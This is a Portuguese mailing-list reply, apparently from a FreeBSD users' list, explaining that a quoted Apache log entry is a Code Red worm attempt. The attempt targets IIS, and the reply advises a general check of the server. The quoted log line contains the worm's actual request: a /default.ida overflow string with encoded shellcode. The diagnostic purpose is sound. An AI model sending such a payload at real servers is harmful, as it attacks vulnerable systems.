Fabio, > >/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a > > HTTP/1.0" 400 327
[ corte ] > 1. pelo fato de essa requisi��o ser sempre a ultima, ser� que ela nao > foi bem sucedida? Este log que mostrasses � tentativa de ataque CodRed. Este tipo de ataque n�o compromete o apache pois ele explora uma vulnerabilidade espec�fica do IIS. Agora... isso n�o quer dizer que ningu�m tenha invadido o seu servidor antes disso... :-/ O ideal � voc� fazer um checagem geral no servidor em busca de "coisas estranhas" como arquivos, programas ou portas abertas. []'s Ronan _______________________________________________________________ Sair da Lista: http://www2.fugspbr.org/mailman/listinfo/fugspbr Historico: http://www4.fugspbr.org/lista/html/FUG-BR/
